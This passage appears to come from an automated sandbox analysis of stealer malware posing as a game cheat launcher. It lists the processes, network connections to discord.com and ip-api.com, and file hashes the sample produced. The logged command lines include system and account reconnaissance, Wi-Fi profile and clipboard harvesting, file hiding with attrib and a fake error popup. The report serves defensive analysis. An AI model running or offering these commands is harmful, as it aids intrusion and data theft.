| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Xylex Aimlock\bin\launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Xylex Aimlock\bin\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Xylex Aimlock\bin\launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "gdb --version"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get Manufacturer
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_ComputerSystem get Manufacturer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\cmd.exe
cmd.exe /c chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:56319 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:56328 | tcp | |
| N/A | 127.0.0.1:56333 | tcp | |
| N/A | 127.0.0.1:56337 | tcp | |
| N/A | 127.0.0.1:56339 | tcp | |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI8802\python311.dll
| MD5 | bd98d92c8c8b8c5983ef725a9bc953a9 |
| SHA1 | 1ad5435b23116ad85a55a55754c42bb788c36388 |
| SHA256 | e41f2d9e02e8498ec53f8286e86011c75e9da0f6b24b2d9979e6e5726ef28913 |
| SHA512 | 48fa76a57c12088d3e24b56e1ace114f028aac5ae383f7810b02dce2768820a7190fc1cc3fd4684a2f06e98c1ccc0641a3f1906e992d7a5736194989c072959e |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\VCRUNTIME140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
memory/4340-50-0x00007FF83E970000-0x00007FF83EF57000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\base_library.zip
| MD5 | 334e5d6e591eccd91d2121194db22815 |
| SHA1 | 821d70c44dc7f25a784e9938d74e75a3471e1ad0 |
| SHA256 | 9e830533f6e67b84d9dbc502db38a6f25d3c984f1a6a195a50f838d48d5b3ba5 |
| SHA512 | bac4a1283745e5eb4db953227bbf00831c8a0c3c831f5889e0d0630841e59c8ad96c3386ce3ad48300f4754fde188212edc79b78c9c98f76bca21987c1c05866 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_ctypes.pyd
| MD5 | 4aab5887ebdd7f0031f4635c6941b2ad |
| SHA1 | 88979cc0cbb1d592cd7f67c03207b3ed9f78721b |
| SHA256 | 4c09339cd35518c312861a93a8854f128472e894e22d08dfb9719b8fdbf21e02 |
| SHA512 | 82d39c716f0ac82c55ebd8cda44aaa4668a9c1425287023c45baf7bfe85367d44b71d2641da18561d43ab2c73f909a91dd39009794d094f15600ec05e301db2b |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\python3.DLL
| MD5 | 34e49bb1dfddf6037f0001d9aefe7d61 |
| SHA1 | a25a39dca11cdc195c9ecd49e95657a3e4fe3215 |
| SHA256 | 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281 |
| SHA512 | edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\libffi-8.dll
| MD5 | 8c3dfeb336b269a16912185fec18560a |
| SHA1 | 809f6454a7d1ae80bf503ca50a3400cf7162706c |
| SHA256 | 92038b9c69411bc4e32fbb7c0c995688261382066d40be1b3d19d15fe2c78587 |
| SHA512 | ee7515332aaf12feedd0b906e0d5f73cb076093ffd39ed90ce5545069acb737049f95733fe18e84fb04777d9895bded04038710832f6810cc0efa77e14879e94 |
memory/4340-61-0x00007FF8570D0000-0x00007FF8570DF000-memory.dmp
memory/4340-60-0x00007FF84D620000-0x00007FF84D644000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_socket.pyd
| MD5 | 0a69997bc03a986bc7d75c60006945d8 |
| SHA1 | 0786395d697bdaed9333c7ce038f523aa73a2646 |
| SHA256 | 3798453f4d01c98253f8ee2305711375c55fc1b1388afd5c4b21342eb3979ba1 |
| SHA512 | 2eeb383f7087a1ae1069b74e78ede4ed99647973c3ff2312a1e41245bb7f3ede13d7545a3f4288687717058ce7eea62eb88297e697932863363c141be8e32ac3 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\select.pyd
| MD5 | 51dbde6a032c1cb33fe0867c74a214d8 |
| SHA1 | 435cf4a6eb85973d536deac09ace2d086ed62eee |
| SHA256 | 8231b643a70605bb0127093a81b637ecae3628b3f4515ea3623af1ebd9988811 |
| SHA512 | 71fa7471cebea3b50e85b9b87c2e655b653a90b2277218efa277facbf052b638db8149adfb869d845f1214ed8c951dc724af972bc3e4bee6bd2656698ed58887 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_bz2.pyd
| MD5 | 13ca9d614b2fad14df6dae63f09a7f1d |
| SHA1 | 47bb6802dc8ea1f668eecebafa2aa89f7c560b7d |
| SHA256 | f3c03bf8167a038c769b7e4138c7317ab6abbc3dffca5cf68837e16946fe4e3f |
| SHA512 | bba4d0ef66101dbf6335d814ae0cc4fe33fc2db015753bacd02cfa251ff56a57fc60b72ee01e7989b7f65b97fd2bfa573c5a20f15b0d408f072252ae3ad77ca5 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_lzma.pyd
| MD5 | 17b991325312d7cf2a693258260586eb |
| SHA1 | 28b8bd9250c35b579b599c5f41d95a5245486d4c |
| SHA256 | fa5b4120fabd142abec01d2e1b8d2931c566f7034e339023f19453c1ce032ea3 |
| SHA512 | 87b312c66916f2ffa84df26cb47dadd590b80d09768b76fe0cde5cd22c599179649bd22d619403ebac4f3c87371c0e0f1e2a2987f00d857dfcc6ebfdaabe36df |
memory/4340-72-0x00007FF84D510000-0x00007FF84D53D000-memory.dmp
memory/4340-71-0x00007FF84D5E0000-0x00007FF84D5F9000-memory.dmp
memory/4340-67-0x00007FF853900000-0x00007FF85390D000-memory.dmp
memory/4340-66-0x00007FF84D600000-0x00007FF84D619000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_sqlite3.pyd
| MD5 | 56ff4b8b3d857f50669453bbb5c97781 |
| SHA1 | 6d002a8f3f0d89ba577f351b7389ca6817494302 |
| SHA256 | d6cf90759d53e6dc909e5a70dae6a6e62721440488b0016ce2e65225b1a46582 |
| SHA512 | d04b643e71c1dddf739c34706fd862b78e2fd7ef158d69aea7a652e6d94158c6297713301b5169994ba1b1554419485925f1e5e48104eadf7628f299ccaea090 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\sqlite3.dll
| MD5 | 8eef4e258e9eac8803b00a8b8862cf1f |
| SHA1 | 9cd6cc933070dbf7cb4acb17f117968450fcfd0d |
| SHA256 | b0546222f0e1002773086118aee36743de4379bdd0d983db32091c814298a2ee |
| SHA512 | 77682ede590f1fced245cf1baeaa1b8108411385d2dd1a7aa62702791eb8dc59b27f45b1899ce20284fe7ebca8d19e5cd3b6f642763ffab1fe8b05fb1817798e |
memory/4340-78-0x00007FF83E3E0000-0x00007FF83E553000-memory.dmp
memory/4340-77-0x00007FF84D4A0000-0x00007FF84D4C3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_ssl.pyd
| MD5 | 8c44f81c7fd61d1f8209c8311a97ee28 |
| SHA1 | df1916c936d54cf52e50ab7288bc81bbfeff95e4 |
| SHA256 | 3be13390721bd3f985a4bee28aabfa18c26c6467585021f9d64d091374bf2982 |
| SHA512 | e55ccdb2e1dc3300caa3509f7968f6489d674c2a109241aebcf128008c0c502e3ef32f4f7e9900ee98aed16aec8ea771a251be6244655f3213bd135fa6227223 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\libcrypto-1_1.dll
| MD5 | 27de3adb1aa7b1ff0067d89a845c0c82 |
| SHA1 | 7a384a012c1735ad6888085ebdc5e22b77415e66 |
| SHA256 | ceb845924d20130a3f6f146c760c5c6865c671ca8ac8b0c69082bc5c02c6b8dc |
| SHA512 | 4477af703c645a6f9df898e96c15a1a264b7611073f0cb3e26bcdcc526147c851ea78bb968447c45c47fda81ba23c652a62da5e46fba5798ba5b5924a76be5de |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\libssl-1_1.dll
| MD5 | b782398ddafd39b3dd9aa6159a4c560d |
| SHA1 | 8531c0e6b40895789f74f46441b1c62a4ad90f62 |
| SHA256 | 416a018f4065f9c243b75971c8bbfd2e1e89aef0e20ffc61c131b96503a0037a |
| SHA512 | 3785e2de21a942b239f05fc3f6972836c9445d00420dbcfbdcec2b543e32b6b197ff7d2812dc3943ea849d26b00bd1a0ab97845fd05c81f73b77e84e722a857e |
memory/4340-83-0x00007FF84D180000-0x00007FF84D1AE000-memory.dmp
memory/4340-88-0x000001663CCF0000-0x000001663D065000-memory.dmp
memory/4340-89-0x00007FF83D990000-0x00007FF83DD05000-memory.dmp
memory/4340-87-0x00007FF83DD10000-0x00007FF83DDC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_asyncio.pyd
| MD5 | 7aba633225a9efe918d40c803f580a86 |
| SHA1 | bcf944b4ab962ca289bfaa354e5a5834a7d6ea5a |
| SHA256 | 23af66f34c12c9148f4a55c034fe1a36641b6ff2288ca385d03a369be053f699 |
| SHA512 | 4ecb14cb1a6547d45dd6c3f3feea68b56829c1bf3f2413f5256669ed2cce8068f4df46615880ab9c7f3c02e9507f7f0c13f92c366ac385cce8aac50ca971f88e |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_hashlib.pyd
| MD5 | d41dc04ffef63a0de45fe243eefca746 |
| SHA1 | 1e44b3fa201f04b0349a73bcf3bc6a5ae3738cfe |
| SHA256 | d7ba8112b69683027eb03ec07aebadf6687d9a52bc82156b22a2cae176c08185 |
| SHA512 | b65f3c7c280ece3521525530cc9e591185dfa91b164804e3a6967e6041140b9aa7753b575ce96b01c9ae7cb03e64850a7e4c6d6df22d81d84dbeb00af71748f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\unicodedata.pyd
| MD5 | 298d946d3b6602290dea169a5abdc8e1 |
| SHA1 | 0edef75f214b978b0181b9bb0de19d6f340d176b |
| SHA256 | b04ea233b5688f11cc967b747eb8e26e4fce48f31534fdbf8b5fee472c518dd2 |
| SHA512 | 9e93147f082d4fcb15be384244a0f490137d4fc616c98c9f4a17d6989559436da6bf12010e2571317067e2c10a341f1fca00a170e294f9c5d519e03fb92a4b6c |
memory/4340-106-0x00007FF83D870000-0x00007FF83D98C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\yarl\_quoting_c.cp311-win_amd64.pyd
| MD5 | 72c9f075649f274214a8abaccf17b2a1 |
| SHA1 | cb93eec3b632f7b150fa82eb5e4340175629ff02 |
| SHA256 | b75cc24aca7c33e0b04d896b99e33ff0c01781bdfe91739e001b7e3d14573b8c |
| SHA512 | 07568c2a42fd53f991a94158e285cb01055ebacff95c66000b790b474f7a472ab001c91bc315f1ef047aaa67fa1b6654d31be1f6ed3bc34c5c839eaa741f904b |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\aiohttp\_helpers.cp311-win_amd64.pyd
| MD5 | b49608e12a3f68c1584d10a76c48d4ed |
| SHA1 | ba01d8d1c5e19c6ab550e1e86b4e14483335d4de |
| SHA256 | 16248d5f337acb7fb3a713952ad355b62e2b81870d2121ad10d156e2db83197b |
| SHA512 | a3c1bd06b58453129c6e9b4fba9934a3484812083d95ae26287ef7e8cc346eba6a5fe7d9bb285fe3d2a0fa15630bbc224317d8372c7b1bb5045532c181e2dc46 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\aiohttp\_http_parser.cp311-win_amd64.pyd
| MD5 | f9ed4c075b768652b231f094829def04 |
| SHA1 | 40fecb53184f7941d9bafa20cf4f9741b10147aa |
| SHA256 | ece6529b53f6839a5725868da5f82e00f08da08b6c649cedded89b8faedd96ae |
| SHA512 | c0eb174f0426133d1f0270e3f36663d98702b73872430a3638b31997d8e91c05c41a0df846ca0e1b5c2679a8c6c79bd155c2d9794dc0fe41a0d1ee7f8a809f5b |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_uuid.pyd
| MD5 | 5c27cd798a3bdd169f876f846170a0ac |
| SHA1 | 4afbfe633e847544b9648a53134cc29ed1784d8b |
| SHA256 | 6fdfa272c94e606ab0133b6d9d465d648a31bf72b67101ee4ba001714f6631ec |
| SHA512 | b683b092571aa01596269ecebc6eb8f68c0027f58ab9984182354ca2ed7df09e0a58c76fe37715bf6275c5c847a9b0524b4a95f70871ec958ca3df4b957c978c |
memory/4340-127-0x00007FF844C00000-0x00007FF844C1E000-memory.dmp
memory/4340-126-0x00007FF84D490000-0x00007FF84D49A000-memory.dmp
memory/4340-125-0x00007FF84CA90000-0x00007FF84CAB2000-memory.dmp
memory/4340-124-0x00007FF84D600000-0x00007FF84D619000-memory.dmp
memory/4340-123-0x00007FF849090000-0x00007FF8490A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\frozenlist\_frozenlist.cp311-win_amd64.pyd
| MD5 | e1071be0938855e1651fcf6faa03f1bf |
| SHA1 | 2c6fbb2d7d695029883ddf6fad14f3e640d320cf |
| SHA256 | 319d49c4dce4fa20f120aefbbde1bef3383ab3ba60d8da9afb48b87fddde3361 |
| SHA512 | b1976fb8550ccfe52bf7db752e0f650858be41df9d40bd36fe2d8fe7e555cefa78cef865f6314a0f62bd54cd4e0369dda7499a9284305b1436791be95d299f5d |
memory/4340-121-0x00007FF844C20000-0x00007FF844C6D000-memory.dmp
memory/4340-120-0x00007FF8490B0000-0x00007FF8490C9000-memory.dmp
memory/4340-119-0x00007FF849700000-0x00007FF849717000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\aiohttp\_websocket.cp311-win_amd64.pyd
| MD5 | 66d90563f45f50368cfe8095a0e7c3e3 |
| SHA1 | f9db82759d4abfc82dce0576ac4a5668ebde69a7 |
| SHA256 | 33c224f02b172bb3c5a9e501560d205b5c14b279cd2c511fdc46550d2f517976 |
| SHA512 | bd77fcafdb8a03113d182a6fc7cb96197e4a5e6aeee975883d488ba0e20e709d9b625d274e4596b96ec7cd33901c940a66fc2c0e1e427c2b8cb93511f0ba980e |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\aiohttp\_http_writer.cp311-win_amd64.pyd
| MD5 | 3118914d29786e0247f1c528507cc4e6 |
| SHA1 | 7ce6a43d9770762ff2cff1c7866a1ef8e1c94089 |
| SHA256 | 454d73a55843e8242224391a0bbc210434cf4ecba23ba1ba6415a9fce997115a |
| SHA512 | 13987cc529309580adafa56c91d9297f162c9cf696c626571223d810ac2487c39b6a50fa5afb8df386438b4ff0d87ad1f00b3e8f116863296642611fb0a3d4e1 |
memory/4340-104-0x00007FF84CAC0000-0x00007FF84CAD4000-memory.dmp
memory/4340-103-0x00007FF83E970000-0x00007FF83EF57000-memory.dmp
memory/4340-99-0x00007FF84CC20000-0x00007FF84CC34000-memory.dmp
memory/4340-98-0x00007FF84D140000-0x00007FF84D152000-memory.dmp
memory/4340-97-0x00007FF84D160000-0x00007FF84D175000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\cryptography\hazmat\bindings\_rust.pyd
| MD5 | 6c63db65af4dfa891a8cb9dac7207c08 |
| SHA1 | f52a68e0fd609b0b81cc7ab68c5b86de192ff0ff |
| SHA256 | 09b758ac4233114ddff0c47bb6f74702183eee7e92f1b8f320f35c9cf8254150 |
| SHA512 | f10c454230697d678ddde0bef906a2a66ace0b5cb529a2fd4997f9230e13496296394b39a10cdf52f5efe020cec607bbdd3d72a1edc369e2ce9119fe5fb161c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\multidict\_multidict.cp311-win_amd64.pyd
| MD5 | 025b9e660270df93a0197dde5afbc6fa |
| SHA1 | 487bb4bc3583e94a466d27f98a3728772e9cf17d |
| SHA256 | 30cb3487d462b9c86ff46c0e476d4def11a1a728c6f3d4ef24b5e2b0fe608d65 |
| SHA512 | 09c8c5b5041bc923a623c3f770f5ab33c7a0fd9c083e33ccc1b00eb9c629ad610f0c27b5f1b03994286847e32fbd505d381aa0c64fa2fa96e6244020803d374f |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_overlapped.pyd
| MD5 | 6d42cb72bc132a066d2ee369e98092f3 |
| SHA1 | 7273625e339cffb842d6b86c7605fb01a62a1700 |
| SHA256 | 2134a894e66cd459bbe27008f35b821508003c38c4e4f2f3be34c586973ca936 |
| SHA512 | f7b6dfc3aa087cd6ffff86d05b0d35cbb69b41fdad71c046d653f61ca222f3b6fbe283c4fc5868560d7879a4eb67ae9f8996efb4de2b7b92e40544578b5065f4 |
memory/4340-130-0x00007FF83CBB0000-0x00007FF83D2A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_cffi_backend.cp311-win_amd64.pyd
| MD5 | 988a1b64ad3b6aa856784996d6b27c6c |
| SHA1 | c680f882b875e208b47607164a54bf95ebecd0aa |
| SHA256 | d4b629d5a24574399bfec29db0aa20f35c81338596ada10a0896e75ffdcfd9a8 |
| SHA512 | 87c3a7bd449a4e144b90d428b19a5d9c4a8ae7f0f68e262dd82bc49fa5fc38ef34268f407d7ccd00f1009fb75dde8d9bf97afdcf39d98f4b19019c6d8f5a14e2 |
memory/4340-133-0x00007FF84D510000-0x00007FF84D53D000-memory.dmp
memory/4340-135-0x00007FF84D710000-0x00007FF84D748000-memory.dmp
memory/4340-134-0x00007FF84D4A0000-0x00007FF84D4C3000-memory.dmp
C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe
| MD5 | 15916166c043ce50f37b0a65f4c5d751 |
| SHA1 | 1ef18a33a5c982514382aba053bee695281ca291 |
| SHA256 | 09ff479a5a9d03f909fd4832b51dbafab4758717624852e697edc8eea26c4086 |
| SHA512 | 1bac7ddd8dfd6b9debf75ea98025770db752889fac5b4b33c1a928097cc57f4f8662ee6173e88840ff9f08e325e2fff2238b6e18fa5b64e26ab9bfd1a7da439d |
C:\Users\Admin\AppData\Local\Temp\_MEI8802\_queue.pyd
| MD5 | c95b814dfb4df76581ffb9b94f9e4971 |
| SHA1 | 756d3f30dc795bccf3f84dc69409c6b988a0c5b2 |
| SHA256 | d62ce06044705dc09ab31719b086a93a951c06f2d3768f6047f1134bd8861f5a |
| SHA512 | 3a5dad81043e9b1991b9621e742a36254d2712f7ae77483b73f3e67cbe8050bcbee2d985bf78534807a268dab61e2758170d8b431ca1e33bb7895d2c08d348a2 |
memory/4340-185-0x00007FF83E3E0000-0x00007FF83E553000-memory.dmp
memory/4340-186-0x00007FF84D670000-0x00007FF84D67D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2g3pel1m.ttb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2256-198-0x0000028A28910000-0x0000028A28932000-memory.dmp
memory/4340-203-0x00007FF84D180000-0x00007FF84D1AE000-memory.dmp
memory/4340-204-0x00007FF83DD10000-0x00007FF83DDC8000-memory.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4340-215-0x000001663CCF0000-0x000001663D065000-memory.dmp
memory/4340-242-0x00007FF84D710000-0x00007FF84D748000-memory.dmp
memory/4340-241-0x00007FF83CBB0000-0x00007FF83D2A4000-memory.dmp
memory/4340-244-0x00007FF83D990000-0x00007FF83DD05000-memory.dmp
memory/4340-237-0x00007FF844C20000-0x00007FF844C6D000-memory.dmp
memory/4340-236-0x00007FF8490B0000-0x00007FF8490C9000-memory.dmp
memory/4340-235-0x00007FF849700000-0x00007FF849717000-memory.dmp
memory/4340-234-0x00007FF84CA90000-0x00007FF84CAB2000-memory.dmp
memory/4340-233-0x00007FF83D870000-0x00007FF83D98C000-memory.dmp
memory/4340-230-0x00007FF84D140000-0x00007FF84D152000-memory.dmp
memory/4340-227-0x00007FF83DD10000-0x00007FF83DDC8000-memory.dmp
memory/4340-225-0x00007FF83E3E0000-0x00007FF83E553000-memory.dmp
